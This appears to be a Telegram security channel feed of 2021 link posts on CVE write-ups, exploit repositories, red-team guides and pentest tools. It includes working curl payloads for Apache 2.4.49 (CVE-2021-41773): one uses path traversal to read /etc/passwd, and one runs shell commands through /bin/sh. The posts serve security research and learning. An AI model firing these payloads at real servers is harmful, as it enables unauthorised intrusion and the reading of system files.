RCE in Citrix ShareFile Storage Zones Controller (CVE-2021-22941)
Amazing writeup on finding a vulnerability through .NET reversing, enjoyed reading about the breakpoints that were set and how they logically owned Citrix ShareFile through a third party dependency
https://codewhitesec.blogspot.com/2021/09/citrix-sharefile-rce-cve-2021-22941.html
#citrix #sharefile #rce
Amazing writeup on finding a vulnerability through .NET reversing, enjoyed reading about the breakpoints that were set and how they logically owned Citrix ShareFile through a third party dependency
https://codewhitesec.blogspot.com/2021/09/citrix-sharefile-rce-cve-2021-22941.html
#citrix #sharefile #rce
Blogspot
CODE WHITE | Blog: RCE in Citrix ShareFile Storage Zones Controller (CVE-2021-22941) – A Walk-Through
Citrix ShareFile Storage Zones Controller uses a fork of the third party library NeatUpload. Versions before 5.11.20 are affected by a rela...
AzureHunter
A Cloud Forensics Powershell module to run threat hunting playbooks on data from Azure and O365
https://github.com/darkquasar/AzureHunter
#azure #o365
A Cloud Forensics Powershell module to run threat hunting playbooks on data from Azure and O365
https://github.com/darkquasar/AzureHunter
#azure #o365
GitHub
GitHub - darkquasar/AzureHunter: A Cloud Forensics Powershell module to run threat hunting playbooks on data from Azure and O365
A Cloud Forensics Powershell module to run threat hunting playbooks on data from Azure and O365 - darkquasar/AzureHunter
$8,000 Payout: XSS to RCE in the Opera Browser
https://blogs.opera.com/security/2021/09/8000-bug-bounty-highlight-xss-to-rce-in-the-opera-browser/
https://blogs.opera.com/security/2021/09/8000-bug-bounty-highlight-xss-to-rce-in-the-opera-browser/
Opera Security
$8,000 Bug Bounty Highlight: XSS to RCE in the Opera Browser
Continuing from his previous post, Bug Bounty Hunter Renwa writes about the second vulnerability he submitted to Opera's Bug Bounty Programme: a Remote Code Execution in Opera's My Flow Feature. What follows is his write-up and experience.
Beginners Guide to 0day/CVE AppSec Research
Walks through finding open-source web apps, environment setup, debugging for vulns, creating a Blind SQL time-based exploit, and publishing to @ExploitDB/MITRE CVE
https://0xboku.com/2021/09/14/0dayappsecBeginnerGuide.html
#appsec #0day #research
Walks through finding open-source web apps, environment setup, debugging for vulns, creating a Blind SQL time-based exploit, and publishing to @ExploitDB/MITRE CVE
https://0xboku.com/2021/09/14/0dayappsecBeginnerGuide.html
#appsec #0day #research
Boku
Beginners Guide to 0day/CVE AppSec Research
This media is not supported in your browser
VIEW IN TELEGRAM
reconFTW
ReconFTW automates the entire process of reconnaisance for you. It outperforms the work of subdomain enumeration along with various vulnerability checks and obtaining maximum information about your target.
https://github.com/six2dez/reconftw
#reconFTW #bugbounty #hacking
ReconFTW automates the entire process of reconnaisance for you. It outperforms the work of subdomain enumeration along with various vulnerability checks and obtaining maximum information about your target.
https://github.com/six2dez/reconftw
#reconFTW #bugbounty #hacking
How to Create an Internal/Corporate Red Team
https://malcomvetter.medium.com/how-to-create-an-internal-corporate-red-team-1023027ea1e3
#redteam
https://malcomvetter.medium.com/how-to-create-an-internal-corporate-red-team-1023027ea1e3
#redteam
Medium
How to Create an Internal/Corporate Red Team
Congratulations! Your organization has approved the creation of an internal Red Team program and tasked you to do it! Here are some quick…
CVE-2021-22005 - VMWare vCenter Server File Upload to RCE
https://github.com/r0ckysec/CVE-2021-22005
#cve #vCenter #RCE
https://github.com/r0ckysec/CVE-2021-22005
#cve #vCenter #RCE
Forwarded from PT SWARM
New article: "Cisco Hyperflex: How We Got RCE Through Login Form and Other Findings"
Read more about critical vulnerabilities (CVSS 9.8, 7.3 and 5.3) found by our researchers
Nikita Abramov & Mikhail Klyuchnikov:
https://swarm.ptsecurity.com/cisco-hyperflex-how-we-got-rce-through-login-form-and-other-findings/
Read more about critical vulnerabilities (CVSS 9.8, 7.3 and 5.3) found by our researchers
Nikita Abramov & Mikhail Klyuchnikov:
https://swarm.ptsecurity.com/cisco-hyperflex-how-we-got-rce-through-login-form-and-other-findings/
GOAD (Game Of Active Directory)
GOAD is a pentest active directory LAB project. The purpose of this lab is to give pentesters a vulnerable Active directory environement ready to use to practice usual attack techniques.
https://github.com/Orange-Cyberdefense/GOAD
#ActiveDirectory #AD #Microsoft #Pentest #vulnerabilites
GOAD is a pentest active directory LAB project. The purpose of this lab is to give pentesters a vulnerable Active directory environement ready to use to practice usual attack techniques.
https://github.com/Orange-Cyberdefense/GOAD
#ActiveDirectory #AD #Microsoft #Pentest #vulnerabilites
APT
Offensive WMI (Part 3) https://0xinfection.github.io/posts/wmi-registry-part-3/ #wmi
Offensive WMI - Reconnaissance & Enumeration (Part 4)
This post focuses on interacting with several WMI classes to extract useful and sensitive information
https://0xinfection.github.io/posts/wmi-recon-enum/
#wmi
This post focuses on interacting with several WMI classes to extract useful and sensitive information
https://0xinfection.github.io/posts/wmi-recon-enum/
#wmi
Information Gathering and Scanning for Sensitive Information
https://0xjoyghosh.medium.com/information-gathering-scanning-for-sensitive-information-reloaded-6ff3455e0d4e
#OSINT #Recon
https://0xjoyghosh.medium.com/information-gathering-scanning-for-sensitive-information-reloaded-6ff3455e0d4e
#OSINT #Recon
Medium
Information Gathering&scanning for sensitive information[ Reloaded ]
Testing Web-Application/Network , Information Gathering is important before we test for vulnerability on the target?
iOS 15 0day Exploits
https://github.com/illusionofchaos/ios-gamed-0day
https://github.com/illusionofchaos/ios-nehelper-wifi-info-0day
https://github.com/illusionofchaos/ios-nehelper-enum-apps-0day
#ios #0day #exploit
https://github.com/illusionofchaos/ios-gamed-0day
https://github.com/illusionofchaos/ios-nehelper-wifi-info-0day
https://github.com/illusionofchaos/ios-nehelper-enum-apps-0day
#ios #0day #exploit
GitHub
GitHub - illusionofchaos/ios-gamed-0day: iOS gamed exploit (fixed in 15.0.2)
iOS gamed exploit (fixed in 15.0.2). Contribute to illusionofchaos/ios-gamed-0day development by creating an account on GitHub.
Apache HTTP Server 2.4.49 Path Traversal (CVE-2021-41773)
https://twitter.com/ducnt_/status/1445386557574324234
#cve #apache
https://twitter.com/ducnt_/status/1445386557574324234
#cve #apache
Twitter
Nguyen The Duc
Just got worked exploit PoC for path traversal in Apache HTTP Server 2.4.49 (CVE-2021-41773) with my collab again @yabeow #bugbountytips 👀
APT
Apache HTTP Server 2.4.49 Path Traversal (CVE-2021-41773) https://twitter.com/ducnt_/status/1445386557574324234 #cve #apache
Payload
curl https://URL/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd -k
APT
Payload curl https://URL/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd -k
Apache 2.4.49 Payload RCE
curl --data "echo;id" 'https://127.0.0.1:55026/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh'Certipy
Python implementation for Active Directory certificate abuse
https://github.com/ollypwn/Certipy
#ADCS
Python implementation for Active Directory certificate abuse
https://github.com/ollypwn/Certipy
#ADCS
GitHub
GitHub - ly4k/Certipy: Tool for Active Directory Certificate Services enumeration and abuse
Tool for Active Directory Certificate Services enumeration and abuse - ly4k/Certipy
Forwarded from PT SWARM
CVE-2021-26420: Remote Code Execution in Sharepoint via workflow compilation
👤 by The ZDI Research Team
In June of 2021, Microsoft released a patch to correct CVE-2021-26420 – a remote code execution bug in the supported versions of Microsoft SharePoint Server. This bug was reported to the ZDI program by an anonymous researcher and is also known as ZDI-21-755. This blog takes a deeper look at the root cause of this vulnerability.
This vulnerability could be used by an authenticated user to execute arbitrary .NET code on the server in the context and permissions of the service account of a SharePoint web application. For a successful attack, the attacker should have “Manage Lists” permissions on any SharePoint site. By default, any authenticated user can create their own site where they have the necessary permissions.
📝 Contents:
• The Vulnerability
• Proof of Concept
• Achieving Remote Code Execution
• Conclusion
https://www.zerodayinitiative.com/blog/2021/10/5/cve-2021-26420-remote-code-execution-in-sharepoint-via-workflow-compilation
👤 by The ZDI Research Team
In June of 2021, Microsoft released a patch to correct CVE-2021-26420 – a remote code execution bug in the supported versions of Microsoft SharePoint Server. This bug was reported to the ZDI program by an anonymous researcher and is also known as ZDI-21-755. This blog takes a deeper look at the root cause of this vulnerability.
This vulnerability could be used by an authenticated user to execute arbitrary .NET code on the server in the context and permissions of the service account of a SharePoint web application. For a successful attack, the attacker should have “Manage Lists” permissions on any SharePoint site. By default, any authenticated user can create their own site where they have the necessary permissions.
📝 Contents:
• The Vulnerability
• Proof of Concept
• Achieving Remote Code Execution
• Conclusion
https://www.zerodayinitiative.com/blog/2021/10/5/cve-2021-26420-remote-code-execution-in-sharepoint-via-workflow-compilation
Zero Day Initiative
Zero Day Initiative — CVE-2021-26420: Remote Code Execution in SharePoint via Workflow Compilation
In June of 2021, Microsoft released a patch to correct CVE-20 21-264 20 – a remote code execution bug in the supported versions of Microsoft SharePoint Server. This bug was reported to the ZDI program by an anonymous researcher and is also known as ZDI…